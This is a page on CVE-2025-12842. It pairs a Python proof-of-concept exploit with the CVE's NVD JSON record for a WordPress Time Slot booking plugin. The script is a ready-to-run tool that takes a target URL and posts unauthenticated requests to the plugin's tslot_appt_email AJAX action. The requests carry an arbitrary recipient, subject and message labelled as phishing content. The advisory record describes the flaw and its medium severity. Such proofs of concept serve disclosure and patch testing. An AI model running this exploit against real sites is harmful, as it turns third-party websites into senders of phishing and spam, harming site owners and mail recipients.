CVE-2025-12842

import requests import sys def exploit_cve_2025_12842(target_url): """ PoC for CVE-2025-12842: Unauthenticated Email Sending in WordPress Time Slot Plugin """ target = target_url.rstrip('/') ajax_url = f"{target}/wp-admin/admin-ajax.php" # Malicious email parameters payload = { 'action': 'tslot_appt_email', 'email_to': '[email protected]', # Arbitrary recipient 'email_subject': 'Phishing Campaign Subject', # Attacker-controlled subject 'email_message': 'Malicious content or phishing link' # Attacker-controlled content } print(f"[*] Sending malicious email request to {ajax_url}") print(f"[*] Target: {target}") print(f"[*] Recipient: {payload['email_to']}") try: response = requests.post(ajax_url, data=payload, timeout=10) if response.status_code == 200: print(f"[+] Request sent successfully!") print(f"[+] Response status: {response.status_code}") print(f"[+] Response body: {response.text[:200]}") else: print(f"[-] Request failed with status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") sys.exit(1) if __name__ == '__main__': if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://example.com") sys.exit(1) exploit_cve_2025_12842(sys.argv[1])

{"cve": {"id": "CVE-2025-12842", "sourceIdentifier": "[email protected]", "published": "2025-11-19T06:15:46.990", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Booking Plugin for WordPress Appointments – Time Slot plugin for WordPress is vulnerable to unauthorized email sending in versions up to, and including, 1.4.7 due to missing validation on the tslot_appt_email AJAX action. This makes it possible for unauthenticated attackers to send appointment notification emails to arbitrary recipients with attacker-controlled text content in certain email fields, potentially enabling the site to be abused for phishing campaigns or spam distribution."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/timeslot/tags/1.4.6/public/form/email.php#L21", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/timeslot/tags/1.4.6/public/form/email.php#L23", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3397527%40timeslot&new=3397527%40timeslot&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/087b6943-5da8-44fe-8614-832768444178?source=cve", "source": "[email protected]"}]}}